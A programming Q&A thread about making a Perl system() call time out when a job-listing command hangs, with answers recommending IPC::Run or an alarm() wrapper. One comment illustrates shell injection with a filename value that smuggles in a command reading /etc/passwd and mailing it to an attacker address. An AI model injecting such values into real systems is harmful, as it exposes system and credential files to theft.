# How to get around SYSTEM (fork-wait) in perl?

Tags: perl

I am using the SYSTEM command in perl to launch a Linux system command and I've run into an issue. From the perldocs describing the SYSTEM command it appears that SYSTEM does a Fork-Wait around the system command call. Unfortunately, if the system command hangs up, the Perl program does too. Below is an example of the system command:

```
system("bjobs -w -r |grep -v GLS | grep -v JOBID   > $bjoblistfile");
```

However, every once in a while the "bjobs" command hangs so this system command does not return.

Is there a way to use the SYSTEM command to "fork-wait" with a timeout option?

Thanks in advance!

Mark

Comment: Use [IPC::Run](http://search.cpan.org/perldoc?IPC::Run).

Comment: Note: Your command suffers from shell injection bug. Based on the variable name, you don't convert the string you inject into a shell literal. IPC::Run will also help you with that.

Comment: Thanks ikegami. I was wondering if there a better way to write the system command. Do you have a link to the "shell injection bug" reference? I'd like to undertand it. I'm also reading up on the IPC::Run page on MetaCPAN.

Comment: [Code injection](https://en.wikipedia.org/wiki/Code_injection). For example, imagine what happens if `$bjoblistfile` has a space in it.

Comment: Regarding shell injection, what if `$bjoblistfile` is `x; cat /etc/passwd | mailx supervillain@evil.org` ? (just an example of course)

Comment: Ah... I see. Thank you ikegami and haukex. This is an interesting thought. Since I'm the script writer and I set the value of the $bjoblistfile I didn't think of the issue. Always different perspectives to learn from. Thanks again. Guess I will continue to experiment with IPC::Run for the timeout issue.

Answer (score 0, accepted):

Use alarm(). Here's a rough outline:

```
my $alarm_msg = "ALARM\n";
my $status;
eval {
    local $SIG{ALRM} = sub { die($alarm_msg) };
    alarm(300);    # set alarm for 5 minutes
    $status = system("shell injection safe command");
    alarm(0); # turn off alarm
};
if ($@ eq $alarm_msg) {
     # the alarm went off
} elsif ($@) {
     # there's a bug in my code above causing eval to fail
}
# perhaps do something with exist status, $status
```

If you really want to use the grep command (as opposed to perl's built-in grep()), consider using just one command:

```
egrep -v 'GLS|JOBID'
```

Comment: Thank you pcjr! This works great and doesn’t need any packages.